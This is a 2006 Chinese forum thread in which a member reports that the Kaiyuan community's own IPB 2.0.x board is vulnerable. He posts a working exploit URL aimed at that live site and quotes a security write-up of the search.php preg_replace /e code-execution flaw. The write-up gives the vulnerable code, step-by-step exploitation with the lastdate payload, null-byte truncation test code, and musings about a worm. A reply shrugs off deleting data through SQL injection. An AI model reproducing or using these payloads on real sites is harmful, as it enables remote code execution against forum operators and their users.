关于开元社区IPB2.0.x论坛的安全漏洞

toothy · 发表于 6.6.2006 09:00:01

详情查看 <a href='http://forums.invisionpower.com/index.php?showtopic=213374' target='_blank'>http://forums.invisionpower.com/index.php?showtopic=213374</a> 漏洞页面: <a href='http://www.kaiyuan.de/forum/index.php?act=Search&CODE=show&searchid=e19f63862da1a1d1c7bf109631755506&search_in=posts&result_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00' target='_blank'>http://www.kaiyuan.de/forum/index.php?act=...*?%20//)%23e%00</a>

toothy · 发表于 6.6.2006 09:05:42

<!--emo&

--><img src='style_emoticons/<#EMO_DIR#>/smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' /> <!--emo&

--><img src='style_emoticons/<#EMO_DIR#>/smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' /> <img src='style_emoticons/<#EMO_DIR#>/smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' /> 顺便查了一下并且测式了 phpinfo()........ 只能说管理员失职阿.. <div class='quotetop'>QUOTE</div><div class='quotemain'>ipb search.php 漏洞分析及思考 <img src='style_emoticons/<#EMO_DIR#>/smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' />  <img src='style_emoticons/<#EMO_DIR#>/smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' />  <img src='style_emoticons/<#EMO_DIR#>/smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' />  <img src='style_emoticons/<#EMO_DIR#>/smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' />  <img src='style_emoticons/<#EMO_DIR#>/smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' /> 创建时间：2006-05-03 文章属性：原创 文章提交：HeiGe (hack-520_at_163.com) ipb search.php 漏洞分析及思考 Author：SuperHei_[At]_ph4nt0m.org Blog：http://superhei.blogbus.com/ Team：http://www.ph4nt0m.org Data: 2006-04-27 ############# ##简单分析### ############# 该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php  行1258-1262：     if ( $this->ipsclass->input['lastdate'] )         {             $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );                     }     } 通过变量input['lastdate']注入/e, $this->output注入shellcode。 ############# ##利用方法### ############# 注册一个用户，发个贴内容[shellcode]如下：[ s u p e r h e i x x x x x x x x e v a l ( p h p i n f 0 ( ) ) ;  // 注意最后的;和//之间有一空格 然后点“Search”--->Search by Keywords：superheixxxxxxxe v a l [记得选择Show results as posts ] 可以得到searchid <a href='http://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&resul' target='_blank'>http://127.0.0.1/ipb215/upload/index.php?a..._in=posts&resul</a> t_type=posts&highlite=superheixxxxxxxe v a l 然后在后面加一个&lastdate=z|e v a l.*?%20//)%23e%00 也就是[/e]提交就ok了： <a href='http://127.0.0.1/ipb215/upload/index.php?act=Search&CODE=show&searchid=81a5a928d500c4653647e5b249ab5f53&search_in=posts&resul' target='_blank'>http://127.0.0.1/ipb215/upload/index.php?a..._in=posts&resul</a> t_type=posts&highlite=superheixxxxxxx e v a l&lastdate=z|e v a l.*?%20//)%23e%00 ############# ##分析讨论### ############# 1. 简单分析： 该漏洞又是一个 preg_replace+/e漏洞,代码在\sources\action_admin\search.php  行1258-1262：     if ( $this->ipsclass->input['lastdate'] )         {             $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );                     }     } 通过变量input['lastdate']注入/e, $this->output注入shellcode。 这个分析，掉了一个重要的细节：preg_replace+/e 里有3个参数，只有第2个参数里的代码才可以执行，但是上面的语句貌似是第3个参数提交 的,其实不然，注意上面preg_replace里的第2个参数：\\1 selected='selected' 里面的\\1 为第一参数里正则表达试匹配后的值。归根结底 我们提交的shellcode还是在第2个参数执行了。 2. 注意最后的;和//之间有一空格 这个又是为什么呢？因为我们提交的lastdate=z|e v a l.*?%20//)%23e%00里是已空格+//为标志的，所以我们提交的shellcode也要有空格+// 3.preg_replace存在null截断漏洞???? 我想这个应该算是php本身一个的漏洞[同以前include的null截断漏洞]，我们测试下，把上面的漏洞写个简单的模型： <? $a=$_GET[a]; echo preg_replace("#(value=[\"']z|e v a l.*?//)#e{$a}[\"'])#i ","\\1 ","heigegegxxxxxxx ev a l(phpinfo());//"); ?> 我们直接提交http://127.0.0.1/test2.php?a=2出现错误： Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3 提交http://127.0.0.1/test2.php?a=%002 则执行phpinfo(). 我们成功截断了。模型代码执行环境要求gpc=off ，但是在很多的web程序里是 经过变量编码和解码在执行的，所以不受gpc的影响，上面的ipb的就可以在gpc=on的情况下截断。 4."lastdate=z|e v a l.*?%20//)%23e%00"的构造 主要是在this->output里以e v a l和%20//为标志取\\1 为执行的php代码。 5.worm的利用？ 还记得Santy吗？就是利用的phpbb里的一个preg_replace，这里会会被利用呢？ipb这个漏洞的利用必须要登陆，但是在ipb注册时候有“图片 认证”，不过据说这个可以编写程序读出来？？只要突破这个worm是有可能的，毕竟ipb的用户有那么多...... ############# ##总结模型### ############# 1.直接在preg_replace第2个变量执行的模式： <? echo preg_replace("/test/e",$h,"jutst test"); ?> 提交http://127.0.0.1/test/11/preg.php?h=phpinfo() 实例如：phpbb的viewtopic.php变量$highliht_match提交php代码执行漏洞 2.通过\\1[或者\\n]提取第3个变量里的php代码并执行的模式： <? echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $h); ?> superheixxxxxxxeval(phpinfo()); // 提交：http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php] </div> 来源: <a href='http://www.xfocus.net/articles/200605/866.html' target='_blank'>www.xfocus.net</a>

taohui · 发表于 6.6.2006 09:49:01

这个不算什么，用mysql注入把数据全部删除也是很正常的事情！

toothy · 发表于 6.6.2006 11:22:21

<div class='quotetop'>QUOTE(taohui @ 06.06.2006, 09:49 )</div><div class='quotemain'>这个不算什么，用mysql注入把数据全部删除也是很正常的事情！ [right][snapback]998964[/snapback][/right] </div> <img src='style_emoticons/<#EMO_DIR#>/embaressed_smile.gif' border='0' style='vertical-align:middle' alt='embaressed_smile.gif' /> <img src='style_emoticons/<#EMO_DIR#>/embaressed_smile.gif' border='0' style='vertical-align:middle' alt='embaressed_smile.gif' />

德国开元华人社区开元周游

新闻看板

找房租房

招聘求职

经验分享

德国生活

买卖市场

留德新生

留学德国

开元交友

心情水吧

美食天地

分类广告

关于开元社区IPB2.0.x论坛的安全漏洞

请您关注我们在:

站点信息

站点统计| 举报| Archiver| 手机版| 小黑屋

Powered by Discuz! X3.2 © 2001-2014 Comsenz Inc.

GMT+1, 9.11.2024 02:44

关于我们|Apps

() 开元网

关于 开元 社区IPB2.0.x论坛的安全 漏洞

请您关注我们在:

站点信息

站点统计| 举报| Archiver| 手机版| 小黑屋

Powered by Discuz! X3.2 © 2001-2014 Comsenz Inc.

GMT+1, 9.11.2024 02:44

关于我们|Apps

关于开元社区IPB2.0.x论坛的安全漏洞